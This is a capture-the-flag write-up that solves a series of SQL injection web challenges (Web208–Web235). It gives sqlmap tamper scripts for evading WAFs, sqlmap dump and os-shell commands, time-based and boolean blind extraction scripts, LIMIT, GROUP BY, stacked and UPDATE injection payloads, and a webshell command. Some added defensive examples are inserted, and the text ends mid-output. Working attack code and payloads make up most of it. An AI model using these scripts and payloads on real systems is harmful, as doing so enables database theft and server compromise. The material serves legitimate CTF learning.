        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]

    return retVal

The roles of the common tamper scripts are as follows:

No.  Script  Description
1  0x2char  Converts each encoded character into an equivalent expression
2  apostrophemask  Replaces single quotes with UTF-8 characters
3  apostrophenullencode  Replaces double quotes with %00%27
4  appendnullbyte  Appends %00 after the payload
5  base64encode  Base64-encodes the payload
6  between  Replaces comparison operators with BETWEEN
7  bluecoat  Replaces spaces with random whitespace characters and = with LIKE
8  chardoubleencode  Double URL-encodes
9  charencode  URL-encodes
10  charunicodeencode  Unicode-encodes
11  charunicodeescape  Reverse-encodes the unencoded characters of the given payload
12  commalesslimit  Rewrites LIMIT clauses
13  commalessmid  Rewrites MID expressions
14  commentbeforeparentheses  Adds an inline comment before parentheses
15  concat2concatws  Replaces CONCAT with CONCAT_WS
16  equaltolike  Replaces = with LIKE
17  escapequotes  Replaces double quotes with \\
18  greatest  Replaces > with GREATEST
19  halfversionedmorekeywords  Adds a comment before each keyword
20  htmlencode  HTML-encodes all non-alphanumeric characters
21  ifnull2casewhenisnull  Rewrites IFNULL expressions
22  ifnull2ifisnull  Replaces IFNULL with IF(ISNULL(A))
23  informationschemacomment  Adds a comment after identifiers
24  least  Replaces > with LEAST
25  lowercase  Converts everything to lowercase
26  modsecurityversioned  Replaces spaces with a versioned comment
27  modsecurityzeroversioned  Adds a complete zero-versioned comment
28  multiplespaces  Adds multiple spaces
29  nonrecursivereplacement  Replaces predefined keywords
30  overlongutf8  Converts all characters to overlong UTF-8
31  overlongutf8more  Converts all characters of the given payload
32  percentage  Adds % before each character
33  plus2concat  Replaces + with the CONCAT function
34  plus2fnconcat  Replaces + with the ODBC function {fn CONCAT()}
35  randomcase  Randomizes the case of characters
36  randomcomments  Splits keywords with /**/
37  securesphere  Appends a specific string
38  sp_password  Appends the sp_password string
39  space2comment  Replaces spaces with /**/
40  space2dash  Replaces spaces with -- plus random characters
41  space2hash  Replaces spaces with # plus random characters
42  space2morecomment  Replaces spaces with /**_**/
43  space2morehash  Replaces spaces with # plus random characters and a newline
44  space2mssqlblank  Replaces spaces with other blank characters
45  space2mssqlhash  Replaces spaces with %23%0A
46  space2mysqlblank  Replaces spaces with other whitespace characters
47  space2mysqldash  Replaces spaces with --%0A
48  space2plus  Replaces spaces with +
49  space2randomblank  Replaces spaces with random characters from an alternative set
50  symboliclogical  Replaces AND and OR with && and ||
51  unionalltounion  Replaces UNION ALL SELECT with UNION SELECT
52  unmagicquotes  Wide-character bypass of GPC
53  uppercase  Converts everything to uppercase
54  varnish  Adds an HTTP header
55  versionedkeywords  Wraps every non-function keyword in a versioned comment
56  versionedmorekeywords  Bypass using versioned comments
57  xforwardedfor  Adds a forged HTTP header

Web208——sqlmap (using multiple tampers)

This challenge is really the same as the previous one: select is filtered in addition, but sqlmap sends SELECT in uppercase, so the previous command still runs.

You can also write your own tamper that turns SELECT into seselectlect; it is more tedious, but closer to the intent of the challenge.

Using multiple tampers:

--tamper="tamper/1.py,tamper/2.py"

python3 sqlmap.py -u "http://53df31eb-ad30-47ee-8baf-3226ce9d3373.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://53df31eb-ad30-47ee-8baf-3226ce9d3373.challenge.ctf.show/api/getToken.php" --tamper="tamper/space2comment.py,tamper/randomcase.py" --safe-freq=1 --data="id=1" -T ctfshow_flaxcac --dump --batch

Web209——sqlmap (custom tamper)

The filter in this challenge:

//filter the incoming parameter
function waf($str){
    //TODO unfinished
    return preg_match('/ |\*|\=/', $str);
}

This challenge needs the space, * and = replaced, so write a tamper of your own:

python3 sqlmap.py -u "http://1c06de92-b8e4-4c14-82fb-16547c048e70.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://1c06de92-b8e4-4c14-82fb-16547c048e70.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect1" --safe-freq=1 --data="id=1" --dump --batch

The contents of doubleSelect1.py:

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces spaces with newlines and '=' with 'like', and rewrites COUNT(*) as
    COUNT(id), so that none of ' ', '*' or '=' (blocked by the Web209 waf) survives.

    Tested against:
        * MySQL 5.5

    Notes:
        * Useful to bypass weak and bespoke web application firewalls
    """

    retVal = payload

    if payload:
        retVal = retVal.replace("COUNT(*)", "COUNT(id)")
        retVal = retVal.replace(" ", chr(0x0a))
        retVal = retVal.replace("=", chr(0x0a) + "like" + chr(0x0a))

    return retVal

Web210——sqlmap (custom tamper)

This challenge requires the payload to be base64-encoded and reversed,then base64-encoded and reversed again, matching the decode function:

//decode the query string
function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
}

The sqlmap command:

python3 sqlmap.py -u "http://4501d927-474b-4f61-8c27-f75f13e693fe.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://4501d927-474b-4f61-8c27-f75f13e693fe.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

The doubleSelect3.py script:

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces spaces with newlines and COUNT(*) with COUNT(id), then applies the
    inverse of the challenge's decode(): reverse, base64, reverse, base64.

    Tested against:
        * MySQL 5.5

    Notes:
        * Useful to bypass weak and bespoke web application firewalls
    """

    retVal = payload

    if payload:
        retVal = retVal.replace(" ", chr(0x0a))
        retVal = retVal.replace("COUNT(*)", "COUNT(id)")
        # reverse the text, base64 it, reverse the base64, base64 again
        retVal = base64.b64encode(retVal[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')

    return retVal
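Added example, not from the write-up: the Web210 decode() function mirrored in Python, with the matching encoder (the transformation doubleSelect3 applies) and a check showing that the encoding layer is only transport, not validation: the decoded id must still be rejected unless it is a plain integer.

```python
import base64


def decode_like_challenge(encoded: str) -> str:
    """Python mirror of the challenge's PHP decode():
    strrev(base64_decode(strrev(base64_decode($id))))"""
    step1 = base64.b64decode(encoded)    # base64_decode($id)
    step2 = step1[::-1]                  # strrev
    step3 = base64.b64decode(step2)      # base64_decode
    return step3[::-1].decode()          # strrev


def encode_like_tamper(payload: str) -> str:
    """Inverse of decode_like_challenge, i.e. what the doubleSelect3 tamper does:
    reverse, base64, reverse, base64."""
    inner = base64.b64encode(payload[::-1].encode())
    return base64.b64encode(inner[::-1]).decode()


def decoded_id_is_valid(encoded: str) -> bool:
    """Server-side check the challenge lacks: after decoding, accept only a plain
    integer.  Obfuscated transport does not stop injection; validating the decoded
    value (or binding it as a query parameter) does."""
    try:
        value = decode_like_challenge(encoded)
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return False
    return value.isdigit()


if __name__ == "__main__":
    sample = "1\nor\n1\nlike\n1"          # constructed payload in doubleSelect3 style
    token = encode_like_tamper(sample)
    print(token, decode_like_challenge(token) == sample, decoded_id_is_valid(token))
```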

Web211——sqlmap (custom tamper)

This challenge works with the same payload as the previous one:

python3 sqlmap.py -u "http://6f4d6084-9340-497a-9513-833709b96427.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://6f4d6084-9340-497a-9513-833709b96427.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

Web212——sqlmap (custom tamper)

Same as the previous two challenges, with the same payload:

python3 sqlmap.py -u "http://8f3663f8-b886-4059-a8e4-6e79aed944a0.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://8f3663f8-b886-4059-a8e4-6e79aed944a0.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

Web213——sqlmap (os-shell)

In this challenge the flag is not in the database, so --os-shell is used to get a shell.

The payload is almost the same as the previous one:

python3 sqlmap.py -u "http://a502893e-c20b-4d93-bd3c-5667a9473042.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://a502893e-c20b-4d93-bd3c-5667a9473042.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --os-shell

Then visit the address sqlmap prints.

Upload a one-line shell there.

Web214——Time-based blind injection

This challenge does not give the injection point directly, but select.js contains a hint:

layui.use('element', function(){
    var element = layui.element;
    element.on('tab(nav)', function(data){
        console.log(data);
    });
});

$.ajax({
    url:'api/',
    dataType:"json",
    type:'post',
    data:{
        ip:returnCitySN["cip"],
        debug:0
    }

});

There is no filtering here, so go straight to blind injection.

Skipping the table and column enumeration, here is the script that extracts the flag:

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://27c31b93-f596-48dd-bb5b-b941d687ae44.challenge.ctf.show/api/"
payload = "if(ascii(substr((select flaga from ctfshow_flagx),{},1))={},sleep(0.5),1)"

for i in range(100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            # a correct guess triggers sleep(0.5), which exceeds the 0.3 s timeout
            res = requests.post(url, data=data, timeout=0.3)
        except requests.Timeout:
            flag += j
            print(flag)

Web215——Time-based blind injection (single-quote closing)

Almost the same as the previous challenge; remember to close the single quote and add a comment.

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://89fc8bfe-d034-493c-bb05-8cc1a2d85682.challenge.ctf.show/api/"
payload = "' or if(ascii(substr((select flagaa from ctfshow_flagxc),{},1))={},sleep(0.5),1) #"

for i in range(100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            # a correct guess triggers sleep(0.5), which exceeds the 0.3 s timeout
            res = requests.post(url, data=data, timeout=0.3)
        except requests.Timeout:
            flag += j
            print(flag)

Web216——Time-based blind injection (closing the base64 in the SQL statement)

where id = from_base64($id);

In this challenge the base64-encoded string cannot be passed as the payload, because after base64 decoding SQL treats the result as a string rather than as part of the statement:

mysql> select from_base64("KiBmcm9tIGN0ZnRhYmxl");
+-------------------------------------+
| from_base64("KiBmcm9tIGN0ZnRhYmxl") |
+-------------------------------------+
| * from ctftable                     |
+-------------------------------------+
1 row in set (0.01 sec)

So try closing the statement instead:

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://14d016ef-4056-4ee9-8741-47ae26ab3f3b.challenge.ctf.show/api/"
# '1') closes both the string literal and the from_base64() call
payload = "'1') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{},1))={},sleep(0.5),1) #"

for i in range(100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            # a correct guess triggers sleep(0.5), which exceeds the 0.3 s timeout
            res = requests.post(url, data=data, timeout=0.3)
        except requests.Timeout:
            flag += j
            print(flag)

Web217——时间盲注(benchmark代替base64)

1
2
3
4
//屏蔽危险分子
function waf($str){
return preg_match('/sleep/i',$str);
}

这题禁用了sleep函数,不过可以使用benchmark代替

1
2
benchmark(count, exp)
将exp表达式执行count次,随着count增加,会产生延迟,借此进行时间盲注

benchmark使用效果如下

mysql> select * from ctftable where user=if(benchmark(10000000,md5(1)),1,"admin");
+----+-------+--------+
| id | user  | passwd |
+----+-------+--------+
|  1 | admin | passwd |
+----+-------+--------+
1 row in set (2.55 sec)

mysql> select * from ctftable where user=if(benchmark(1,md5(1)),1,"admin");
+----+-------+--------+
| id | user  | passwd |
+----+-------+--------+
|  1 | admin | passwd |
+----+-------+--------+
1 row in set (0.00 sec)

Script:

import time
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://65a843b3-0560-467f-89d2-37eb70af1063.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaabc from ctfshow_flagxccb),{},1))={},benchmark(1000000,md5(1)),1) #"

for i in range(1, 100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            res = requests.post(url, data=data, timeout=0.3)
        except requests.exceptions.Timeout:
            # the request timed out, so benchmark() ran: this character matched
            flag += j
            print(flag)
            time.sleep(0.2)
            break
        time.sleep(0.2)  # pause between guesses so delays do not pile up on the server

Web218——Time-based blind injection (Cartesian product, regular expressions, table locks in place of sleep/benchmark)

// block dangerous elements
function waf($str){
    return preg_match('/sleep|benchmark/i',$str);
}

Build a long string with rpad or repeat and use a regular-expression match against it to produce the delay.

concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'

mysql> select * from ctftable where if((concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1,1);
+----+-------+--------+
| id | user  | passwd |
+----+-------+--------+
|  1 | admin | passwd |
|  2 | user  | pass   |
|  3 | Lxxx  | 123456 |
+----+-------+--------+
3 rows in set (3.63 sec)

Script:

import time
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://8033ccc0-075e-41b3-b971-3d4953b519f6.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaac from ctfshow_flagxc),{},1))={},(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1) #"

for i in range(1, 100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            res = requests.post(url, data=data, timeout=0.3)
        except requests.exceptions.Timeout:
            # the request timed out, so the regex match ran: this character matched
            flag += j
            print(flag)
            time.sleep(0.2)
            break
        time.sleep(0.2)  # pause between guesses so delays do not pile up on the server

Cartesian-product delay method:

Cartesian product (joining tables is a very expensive operation)
A x B = the set of every combination of an element of A with an element of B, i.e. the join
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select * from table_name A, table_name B
select * from table_name A, table_name B,table_name C
select count(*) from table_name A, table_name B,table_name C   -- the tables may all be the same table

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B;
+----------+
| count(*) |
+----------+
| 62805625 |
+----------+
1 row in set (1.74 sec)

Reference article:

Web219——Time-based blind injection (regexp in place of rlike)

// block dangerous elements
function waf($str){
    return preg_match('/sleep|benchmark|rlike/i',$str);
}

Much the same as the previous challenge: the table name changed and rlike is filtered, so use regexp in place of rlike.

import time
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://1fc4d6ea-2eaf-4fb9-8cef-313556135676.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaabc from ctfshow_flagxca),{},1))={},(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) REGEXP '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1) #"

for i in range(1, 100):
    for j in flagstr:
        data = {
            "debug": "0",
            "ip": payload.format(i, ord(j))
        }
        try:
            res = requests.post(url, data=data, timeout=0.3)
        except requests.exceptions.Timeout:
            # the request timed out, so the regex match ran: this character matched
            flag += j
            print(flag)
            time.sleep(0.2)
            break
        time.sleep(0.2)  # pause between guesses so delays do not pile up on the server

Web220——Time-based blind injection (using a Cartesian product for the delay)

// block dangerous elements
function waf($str){
    return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}

Cartesian-product delay method:

Cartesian product (joining tables is a very expensive operation)
A x B = the set of every combination of an element of A with an element of B, i.e. the join
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select * from table_name A, table_name B
select * from table_name A, table_name B,table_name C
select count(*) from table_name A, table_name B,table_name C   -- the tables may all be the same table

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B;
+----------+
| count(*) |
+----------+
| 62805625 |
+----------+
1 row in set (1.74 sec)

Script:

Note that substr is filtered here, so like is used instead. The timing error in this challenge is fairly large; set the time.sleep interval according to your own network conditions.

import time
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://52153ae3-dc5b-4be8-a12d-4ea2f085ebfc.challenge.ctf.show/api/"
payload = "if((select flagaabcc from ctfshow_flagxcac) like '{}%',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)"

for i in range(1, 100):
    for j in flagstr:
        data = {
            "debug": "0",
            # like compares the whole prefix found so far plus one guessed character
            "ip": payload.format(flag + j)
        }
        try:
            res = requests.post(url, data=data, timeout=0.2)
        except requests.exceptions.Timeout:
            # the request timed out, so the Cartesian join ran: this character matched
            flag += j
            print(flag)
            time.sleep(0.2)
            break
        time.sleep(0.2)  # pause between guesses so delays do not pile up on the server
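The growing keyword blocklists in Web217 through Web220 show why filtering function names does not stop time-based injection: each new delay primitive (benchmark, a regex over an rpad string, a Cartesian join of information_schema) slips past the previous pattern. The following is an added example and not code from the writeup: it re-expresses the page's Web219 and Web220 waf() patterns in Python, runs constructed payloads shaped like the ones above through them, and contrasts that with an allowlist that accepts only what the ip parameter is meant to carry, a syntactically valid IP address. The payload strings and their table and column names are constructed placeholders.

```python
import ipaddress
import re

# The page's waf() patterns for Web219 and Web220, re-expressed for Python's re module.
WAF_WEB219 = re.compile(r"sleep|benchmark|rlike", re.I)
WAF_WEB220 = re.compile(
    r"sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr", re.I)

# Constructed inputs shaped like the page's payloads (placeholder table/column names).
LEGIT_IP = "10.0.0.5"
PAYLOAD_REGEXP = ("'1') or if(ascii(substr((select f from t),1,1))=99,"
                  "(concat(rpad(1,999999,'a'),rpad(1,999999,'a')) "
                  "REGEXP '(a.*)+(a.*)+b'),1) #")
PAYLOAD_CARTESIAN = ("if((select f from t) like 'c%',(SELECT count(*) FROM "
                     "information_schema.columns A, information_schema.columns B),1)")


def blocklist_blocks(pattern, value):
    """True when a keyword blocklist would reject this value."""
    return pattern.search(value) is not None


def allowlist_accepts(value):
    """Accept only a syntactically valid IP address, the one thing the 'ip'
    parameter is supposed to carry; anything else is rejected outright."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def evaluate(value):
    """Summarise how each control treats one input."""
    return {
        "web219_blocklist": blocklist_blocks(WAF_WEB219, value),
        "web220_blocklist": blocklist_blocks(WAF_WEB220, value),
        "allowlist": allowlist_accepts(value),
    }


if __name__ == "__main__":
    for label, value in [("legit ip", LEGIT_IP),
                         ("regexp delay", PAYLOAD_REGEXP),
                         ("cartesian delay", PAYLOAD_CARTESIAN)]:
        print(label, evaluate(value))
```

The Web219 pattern lets both constructed payloads through, the Web220 pattern stops only the one that still uses ascii/substr/concat, and the allowlist rejects both while accepting the legitimate address.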

Web221——Other injection (LIMIT injection in MySQL 5.5.x)

In MySQL 5.5.x, SQL injection is possible after LIMIT; first, an article by p牛:

Error-based injection after LIMIT:

mysql> SELECT * FROM ctftable WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
1105 - XPATH syntax error: ':5.5.41'

Time-based injection after LIMIT:

mysql> SELECT * FROM ctftable WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(ASCII(MID(database(),1,1)) LIKE 76, BENCHMARK(5000000,SHA1(1)),1))))),1);
1105 - XPATH syntax error: ':0'

This challenge only needs the database name; the payload is:

/api/?page=1&limit=7%20procedure%20analyse(extractvalue(1,concat(0x7e,database(),0x7e)),1)

Database name: ctfshow_web_flag_x

Web222——Other injection (GROUP BY injection)

form.on('submit(*)', function(data){
    var table = layui.table;
    table.reload('user_table', {
        url:'api/?u=username'
    })
    return false;
});

This challenge tests GROUP BY injection.

/api/?u=id

Blind injection is possible directly at this spot:

/api/?u=if(1,id,0)

Script:

import time
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://16103046-1e03-4013-b799-657ac0987928.challenge.ctf.show/api/"
payload = "if(ascii(substr((select flagaabc from ctfshow_flaga),{},1))={},id,0)"

for i in range(1, 100):
    for j in flagstr:
        param = {
            "u": payload.format(i, ord(j))
        }
        res = requests.get(url, params=param)
        # the response contains "userAUTO" only when the guess is right
        if "userAUTO" in res.text:
            flag += j
            print(flag)
            break
        time.sleep(0.2)

Web223——Other injection (GROUP BY injection, using true to get around the digit restriction)

//TODO: very safe, no filtering needed
//the username cannot be a number

This challenge does not allow digits; as covered earlier, true and false can stand in for numbers.

mysql> select true;
+------+
| TRUE |
+------+
|    1 |
+------+
1 row in set (0.04 sec)

mysql> select false;
+-------+
| FALSE |
+-------+
|     0 |
+-------+
1 row in set (0.02 sec)

mysql> select true+true+true;
+----------------+
| true+true+true |
+----------------+
|              3 |
+----------------+
1 row in set (0.03 sec)

Web224——Other injection (filename injection)

The mechanism behind this one is somewhat involved; the solution is given here and a separate article explaining the principle will follow.

robots.txt

User-agent: *
Disallow: /pwdreset.php

Visiting /pwdreset.php resets the password and gets you into the admin backend.

The backend is a file-upload page.

zip and bin uploads are allowed; the link to the payload file uploaded for this challenge follows (it is compressed, decompress it before use):

After the upload a 1.php appears in the web root: a GET-based one-line webshell with password 1.

/1.php?1=echo `cat%20/flag`;

Running it returns the flag.

See the blog post below for the details; I will also write them up later.

Web225——Stacked injection, advanced (handler and prepared statements)

Prepared statements:

api/?username=';PREPARE Lxxx from concat('s','elect', ' database()');EXECUTE Lxxx;

';PREPARE Lxxx from concat('s','elect', ' group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flagasa\'');EXECUTE Lxxx;

';PREPARE Lxxx from concat('s','elect', ' flagas from ctfshow_flagasa');EXECUTE Lxxx;

handler:

';show tables;

';handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

Web226——Stacked injection, advanced (hex to get past the filter; handler, prepared statements)

//the master says the more you filter the better
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
    die(json_encode($ret));
}

Prepared statement:

';PREPARE Lxxx from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE Lxxx;

handler:

';handler ctfsh_ow_flagas open;handler ctfsh_ow_flagas read first;

Web227——Stacked injection, advanced (viewing stored procedures and functions)

information_schema.routines lists stored procedures and functions.

';PREPARE Lxxx from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE Lxxx;

Web228——Stacked injection, advanced (hex, prepared statements)

';PREPARE Lxxx from 0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d2763746673686f775f77656227;EXECUTE Lxxx;

';handler ctfsh_ow_flagasaa open;handler ctfsh_ow_flagasaa read first;

Web229——Stacked injection, advanced (hex, prepared statements)

This one filters open, so use a prepared statement to get the flag.

';PREPARE Lxxx from 0x73656c65637420666c6167617362612066726f6d20666c6167;EXECUTE Lxxx;

Web230——Stacked injection, advanced (hex, prepared statements)

Same as the previous challenge.

';PREPARE Lxxx from 0x73656c65637420666c616761736261732066726f6d20666c61676161626278;EXECUTE Lxxx;

Web231——UPDATE injection (no filtering)

The contents of select.js:

$.ajax({
    url:'api/',
    type:'post',
    data:{
        'username':obj.data.username,
        'password':obj.data.pass
    },
    success:function(data){
        layer.msg(JSON.parse(data).msg);
        table.reload('user_table', {
            url:'api/'
        });
    }
});

So username and password are sent via POST.

Request the api page:

password=user',username=database() where 1=1#&username=1

Back on update.php the database name shows as ctfshow_web.

password=user',username=(select flagas from flaga) where 1=1#&username=1

Go back to the page to get the flag.

Web232——UPDATE injection (closing the quote)

//paginated query
$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

The closing changes; the payload is:

password=123') ,username=(select flagass from flagaa)where 1=1#&username=1

Web233——UPDATE injection (time-based)

This challenge uses time-based injection; the script:

import requests

url = "http://775e9c84-659d-4dc1-b832-b4ffb0202410.challenge.ctf.show/api/"
flagstr = "ctfshow1234567890abde{_-}"
payload = "1' or if(ascii(substr((select flagass233 from flag233333),{},1))<={},sleep(0.02),0)#"
flag = ""

for i in range(1, 100):
    # binary search on the ASCII value: a timeout means ascii(char) <= mid
    low, high = 33, 127
    while low < high:
        mid = (low + high) // 2
        data = {
            "username": payload.format(i, mid),
            "password": "1"
        }
        try:
            res = requests.post(url, data=data, timeout=0.4)
        except requests.exceptions.Timeout:
            high = mid
        else:
            low = mid + 1
    if low == 33:
        # ascii() of an empty substr is 0, so every guess timed out: end of the flag
        break
    flag += chr(low)
    print(flag)

Web234——UPDATE injection (backslash to get past the single-quote filter)

Single quotes are filtered here but backslashes are not, so a backslash in the input escapes the single quote that follows it.

username=,username=(select flagass23s3 from flag23a)#&password=\

The SQL statement becomes:

update ctfshow_user set pass = '\' where username = ',username=(select flagass23s3 from flag23a)#';
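What the backslash does to the string-built statement above, and the fix, as an added example that is not the challenge's code: strip_single_quotes mirrors the filter the page describes for Web234, build_update_unsafe reproduces the page's statement shape, mysql_literal_end applies MySQL's default backslash-escape rule to show where the password literal really ends, and update_password_safe is the hardened parameterised form, run here against an in-memory SQLite table standing in for ctfshow_user (constructed sample data).

```python
import hashlib
import sqlite3

# The Web234 input as the page shows it (a single backslash as the password).
FILTERED_USERNAME = ",username=(select flagass23s3 from flag23a)#"
FILTERED_PASSWORD = "\\"


def strip_single_quotes(value):
    """The filter the page describes: single quotes removed, backslash untouched."""
    return value.replace("'", "")


def build_update_unsafe(password, username):
    """String-built UPDATE in the shape of the page's Web232/Web234 statement."""
    return ("update ctfshow_user set pass = '{}' where username = '{}';"
            .format(strip_single_quotes(password), strip_single_quotes(username)))


def mysql_literal_end(sql, start):
    """Index just past the single-quoted literal opening at sql[start], applying
    MySQL's default rule that a backslash escapes the following character."""
    i = start + 1
    while i < len(sql):
        if sql[i] == "\\":
            i += 2            # skip the escaped character, including \'
            continue
        if sql[i] == "'":
            return i + 1
        i += 1
    return len(sql)


def injected_tail(sql):
    """Text MySQL would parse as live SQL once the password literal has
    swallowed the WHERE clause."""
    first = sql.index("'")
    return sql[mysql_literal_end(sql, first):]


def md5_hex(value):
    return hashlib.md5(value.encode()).hexdigest()


def update_password_safe(conn, username, password):
    """Hardened form: placeholders carry both values, so a backslash is just data."""
    cur = conn.execute("update ctfshow_user set pass = ? where username = ?",
                       (md5_hex(password), username))
    return cur.rowcount


def demo_db():
    """In-memory stand-in for ctfshow_user with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ctfshow_user (username text, pass text)")
    conn.execute("insert into ctfshow_user values ('user', 'x')")
    return conn


if __name__ == "__main__":
    sql = build_update_unsafe(FILTERED_PASSWORD, FILTERED_USERNAME)
    print(sql)
    print("executed as SQL after the literal:", injected_tail(sql))
```

With the parameterised statement the Web234 username matches no row and a backslash password is simply hashed and stored.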

Web235——UPDATE injection (bypassing information_schema, injection without column names)

Bypassing information_schema:

With information_schema filtered, table names can be read from mysql.innodb_table_stats.

Injection without column names:

mysql> select * from ctftable;
+----+-------+--------+
| id | user  | passwd |
+----+-------+--------+
|  1 | admin | passwd |
|  2 | user  | pass   |
|  3 | Lxxx  | 123456 |
+----+-------+--------+
3 rows in set (0.00 sec)

mysql> select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from ctftable)a;
+------------------------------------------------+
